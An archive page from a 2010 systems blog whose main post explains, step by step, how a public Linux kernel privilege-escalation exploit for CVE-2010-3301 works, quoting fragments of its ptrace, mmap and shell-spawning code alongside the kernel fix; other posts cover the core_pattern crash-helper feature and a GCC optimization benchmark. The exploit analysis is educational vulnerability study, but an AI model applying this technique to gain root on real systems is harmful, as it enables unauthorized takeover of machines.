time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Archive for the ‘systems’ Category

detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301)

View Comments

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.


This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions are a faster syscall interface than the traditional int 0x80 interface, but aren’t available on some older 32bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call thus maintaing support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:

/* . . . */
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look2:

        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro3:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call which actually transfers execution to the system call4:

        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code is calling the function whose address is stored at ia32_sys_call_table[8 * %rax]. That is, the (8 * %rax)th entry in the ia32_sys_call_table.

subtle bug leads to sexy exploit

This bug was originally discovered by the polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made by possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.

These three stars align and allow an attacker cause an integer overflow in ia32_do_call causing the kernel to hand off execution to an arbitrary address.

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and executing two copies of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");

The child process is set up to be traced with ptrace by setting the PTRACE_TRACEME.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)

                /* ... */
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                        set = 1;
                /* ... */
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");

The parents calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking the address of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
          /* ... */            

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

int kernelmodecode(void *file, void *vma)
	return -1;

The address of that function is written over and over to the 64mb memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of eax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.


  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.


  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424 []
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439 []
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50 []
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430 []

Written by Joe Damato

September 27th, 2010 at 4:59 am

an obscure kernel feature to get more info about dying processes

View Comments

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.


This post will describe how I stumbled upon a code path in the Linux kernel which allows external programs to be launched when a core dump is about to happen. I provide a link to a short and ugly Ruby script which captures a faulting process, runs gdb to get a backtrace (and other information), captures the core dump, and then generates a notification email.

I don’t care about faults because I use monit, god, etc


Your processes may get automatically restarted when a fault occurs and you may even get an email letting you know your process died. Both of those things are useful, but it turns out that with just a tiny bit of extra work you can actually get very detailed emails showing a stack trace, register information, and a snapshot of the process’ files in /proc.

random walking the linux kernel

One day I was sitting around wondering how exactly the coredump code paths are wired. I cracked open the kernel source and started reading.

It wasn’t long until I saw this piece of code from exec.c1:

void do_coredump(long signr, int exit_code, struct pt_regs *regs)
  /* .... */
  ispipe = format_corename(corename, signr);

   if (ispipe) {
   /* ... */

Hrm. ispipe? That seems interesting. I wonder what format_corename does and what ispipe means. Following through and reading format_corename2:

static int format_corename(char *corename, long signr)
	/* ... */

        const char *pat_ptr = core_pattern;
        int ispipe = (*pat_ptr == '|');

	/* ... */

        return ispipe;

In the above code, core_pattern (which can be set with a sysctl or via /proc/sys/kernel/core_pattern) to determine if the first character is a |. If so, format_corename returns 1. So | seems relatively important, but at this point I’m still unclear on what it actually means.

Scanning the rest of the code for do_coredump reveals something very interesting3 (this is more code from the function in the first code snippet above):

     /* ... */

     helper_argv = argv_split(GFP_KERNEL, corename+1, NULL);

     /* ... */

     retval = call_usermodehelper_fns(helper_argv[0], helper_argv,
                             NULL, UMH_WAIT_EXEC, umh_pipe_setup,
                             NULL, &cprm);

    /* ... */

WTF? call_usermodehelper_fns? umh_pipe_setup? This is looking pretty interesting. If you follow the code down a few layers, you end up at call_usermodehelper_exec which has the following very enlightening comment:

 * call_usermodehelper_exec - start a usermode application
 *  . . .
 * Runs a user-space application.  The application is started
 * asynchronously if wait is not set, and runs as a child of keventd.
 * (ie. it runs with full root capabilities).

what it all means

All together this is actually pretty fucking sick:

  • You can set /proc/sys/kernel/core_pattern to run a script when a process is going to dump core.
  • Your script is run before the process is killed.
  • A pipe is opened and attached to your script. The kernel writes the coredump to the pipe. Your script can read it and write it to storage.
  • Your script can attach GDB, get a backtrace, and gather other information to send a detailed email.

But the coolest part of all:

  • All of the files in /proc/[pid] for that process remain intact and can be inspected. You can check the open file descriptors, the process’s memory map, and much much more.

ruby codez to harness this amazing code path

I whipped up a pretty simple, ugly, ruby script. You can get it here. I set up my system to use it by:

% echo "|/path/to/core_helper.rb %p %s %u %g" > /proc/sys/kernel/core_pattern 


  • %pPID of the dying process
  • %s – signal number causing the core dump
  • %u – real user id of the dying process
  • %g – real group id of the dyning process

Why didn’t you read the documentation instead?

This (as far as I can tell) little-known feature is documented at linux-kernel-source/Documentation/sysctl/kernel.txt under the “core_pattern” section. I didn’t read the documentation because (little known fact) I actually don’t know how to read. I found the code path randomly and it was much more fun an interesting to discover this little feature by diving into the code.


  • This could/should probably be a feature/plugin/whatever for god/monit/etc instead of a stand-alone script.
  • Reading code to discover features doesn’t scale very well, but it is a lot more fun than reading documentation all the time. Also, you learn stuff and reading code makes you a better programmer.


  1. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1836 []
  2. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1446 []
  3. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1836 []

Written by Joe Damato

September 20th, 2010 at 4:59 am

Slides from Defcon 18: Function hooking for OSX and Linux

View Comments

Written by Aman Gupta

August 1st, 2010 at 11:24 am

GCC optimization flag makes your 64bit binary fatter and slower

View Comments

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

The intention of this post is to highlight a subtle GCC optimization bug that leads to slower and larger code being generated than would have been generated without the optimization flag.

UPDATED: Graphs are now 0 based on the y axis. Links in the tidbits section (below conclusion) for my ugly test harness and terminal session of the build of the test case in the bug report, objdump, and corresponding system information.

Hold the #gccfail tweets, son.

Everyone fucks up. The point of this post is not to rag on GCC. If writing a C compiler was easy then every asshole with a keyboard would write one for fun.


Watch yourself.

The original bug report for -fomit-frame-pointer.

I stumbled across a bug report for GCC that was very interesting. It points out a very subtle bug that occurs when the -fomit-frame-pointer flag is passed to GCC. The bug report is for 32bit code, however after some testing I found that this bug also rears its head in 64bit code.

What is -fomit-frame-pointer supposed to do?

The -fomit-frame-pointer flag is intended to direct GCC to avoid saving and restoring the frame pointer (%ebp or %rbp). This is supposed to make function calls faster, since the function is doing less work each invocation. It should also make function code take fewer bytes since there are fewer instructions being executed.

A caveat of using -fomit-frame-pointer is that it may make debugging impossible on certain systems. To combat this on Linux, .debug_frame and .eh_frame sections are added to ELF binaries to assist in the stack unwinding process when the frame pointer is omitted.

What is the bug?

The bug is that when -fomit-frame-pointer is used, GCC erroneously uses the frame pointer register as a general purpose register when a different register could be used instead.


The amd64 and i386 ABIs1 2 specify a list of caller and callee saved registers.

  • The frame pointer register is callee saved. That means that if a function is going to use the frame pointer register, it must save and restore the value in the register.
  • The test case provided in the bug report shows that other caller saved registers were available for use.
  • Had the function used a caller saved register instead, there would be no need for the additional save and restore instructions in the function.
  • Removing those instructions would take fewer bytes and execute faster.

What are the consequences?

Let’s take a look at two potential pieces of code.

The first piece is the code that would be generated if -fomit-frame-pointer is not used:

        pushq %rbp       ; save frame pointer
        movq %rsp,%rbp   ; update frame pointer to the current stack pointer
           ; here is where your function would do work
        leave            ; restore the stack pointer and frame pointer
        ret              ; return

Size: 6 bytes.

The above assembly sequence uses the frame pointer.

Let’s take a look at the code that is generated by GCC when -fomit-frame-pointer is used:

        sub $0x8, %rsp    ; make room on the stack
        movq %rbp, (%rsp) ; store rbp on the stack
          ; here is where your function would modify and use %rbp as needed
        movq (%rsp), %rbp ; restore %rbp
        add $0x8, %rsp    ; get rid of the extra stack space
        ret               ; return

Size: 17 bytes.

The above assembly sequence is what is generated when GCC decides to use the frame pointer register as a general purpose register. Since it is callee saved, it must be saved before being modified and restored after being modified.

So -fomit-frame-pointer makes your binary fatter, but does it make it slower?

Only one way to find out: do science.

I built a simple (and very ugly) testing harness to test the above pieces of code to determine which piece of code is faster. Before we get into the benchmark results, I want to tell you why my benchmark is bullshit.

Yes, bullshit.

You see, it makes me sad when people post benchmarks and neglect to tell others why their benchmark may be inaccurate. So, lemme start the trend.

This benchmark is useless because:

  • Reading the CPU cycle counter is unreliable (more on this below the conclusion). I also tracked wall clock time, too.
  • I don’t have the ideal test environment. I ran this on bare metal hardware, and set the CPU affinity to keep the process pinned to a single CPU… BUT
  • I could have done better if I had pinned init to CPU0 (thereby forcing all children of init to be pinned to CPU0 – remember child processes inherit the affinity mask). I would have then had an entire CPU for nothing but my benchmark.
  • I could have done better if I forced the CPU running my benchmark program to not handle any IRQs.
  • I only tested one version of GCC: (Debian 4.3.2-1.1) 4.3.2
  • I could have taken more samples.

You can find more testing harness tidbits below the conclusion.

Benchmark Results

test 1 — Code sequence simulating using the frame pointer.
test 2 — Code sequence simulating using the frame pointer as a general purpose register.

64bit results

Using -fomit-frame-pointer is SLOWER (contrary to what you’d expect) than not using it!

cycles test 1 cycles test 2 microsecs test 1 microsecs test 2
mean 3514422987.92 4559685515.66 1882707.27 2442663.94
median 3507007423.5 4562511684.5 1878721.5 2444171.5
max 3922780211 4672066854 2101457 2502869
min 3502194976 4327782795 1876113 2318452
std dev 31927179.5632 15449507.8196 17103.7755 8275.49788
variance 1.02E+15 238687291867021 292539135.936 68483865.11835

32bit results

Using -fomit-frame-pointer is FASTER (as it should be) than not using it! The binary is still fatter, though.

cycles test 1 cycles test 2 microsecs test 1 microsecs test 2
mean 3502932799.49 3491263364.89 1876553.08 1870301.35
median 3501486586.5 3492013955.5 1875778 1870702.5
max 3905163528 3731985243 2092032 1999259
min 3500916510 3408834436 1875472 1826144
std dev 10066939.1113 7992367.6913 5393.0412 4281.5466
variance 101343263071403 63877941312996.4 29084893.2588 18331640.9459


  • GCC is a really complex piece of software; this bug is very subtle and may have existed for a while.
  • I’ve said this a few times, but knowing and understanding your system’s ABI is crucial for catching bugs like these.
  • Math and science are cool now, much like computers. You should use both.

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

Testing harness tidbits

Each run of the benchmark executes either test1 or test2 (from above) 500,000,000 times. I did around 2500 runs for each test function.

You can get the testing harness, a build script, and a test script here: http://gist.github.com/483524

You can look at the terminal session where I build the test from the original bug report on my system: http://gist.github.com/483494

The code I used to read the CPU cycle counter looks like this:

static __inline__ unsigned long long rdtsc(void)
  unsigned long hi = 0, lo = 0;
  __asm__ __volatile__ ("lfence\n\trdtsc" : "=a"(lo), "=d"(hi));
  return ( (unsigned long long)lo)|( ((unsigned long long)hi)<<32 );

The lfence instruction is a serializing instruction that ensures that all load instructions which were issued before the lfence instruction have been executed before proceeding. I did this to make sure that the cycle counter was being read after all operations in the test functions were executed.

The values returned by this function are misleading because CPU frequency may be scaled at any time. This is why I also measured wall clock time.


  1. http://www.sco.com/developers/devspecs/abi386-4.pdf []
  2. http://www.x86-64.org/documentation/abi.pdf []

Written by Joe Damato

July 20th, 2010 at 5:59 am

Garbage Collection and the Ruby Heap (from railsconf)

View Comments

Written by Joe Damato

June 8th, 2010 at 9:38 am